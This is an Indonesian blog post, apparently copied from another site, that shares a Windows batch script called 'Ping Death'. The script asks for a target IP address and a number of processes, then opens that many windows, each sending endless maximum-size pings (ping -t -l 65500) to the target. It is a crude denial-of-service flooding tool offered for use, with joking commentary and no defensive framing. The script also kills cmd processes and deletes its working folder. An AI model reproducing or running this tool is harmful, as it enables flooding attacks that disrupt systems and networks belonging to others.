ping death

death?? wowo angker deh heuheuheu
langsung aja deh disimak


@echo off

cls

echo PING DEATH

echo.

echo How many ping processes do you want?

set /p amount=

if not exist PD md PD

cd PD

echo Enter the IP:

set /p ip=

for /L %%A IN (1,1,%amount%) DO echo @echo off > PD%%A.bat

for /L %%A IN (1,1,%amount%) DO echo ping -t -l 65500 %ip% >> PD%%A.bat

cd..

for /L %%A IN (1,1,%amount%) DO start PD\pd%%A.bat

prompt $G$S

:a

echo Enter 'terminate' to end all processes

set /p input=

if %input%==terminate goto term

goto a

:term

tasklist /FI "IMAGENAME eq cmd.exe" > PID.txt

setLocal EnableDelayedExpansion

for /F "skip=4 tokens=1,2*" %%A in (PID.txt) do taskkill /PID %%B

echo.

echo Any ERRORS above means that process must be manually terminated

cd PD

del *.* /Q

cd..

rmdir PD

goto eof

:eof



huehueheuheuheuhueheuheuheuhue

copas dari ThE H@ck!!!nG

0 komentar:

Posting Komentar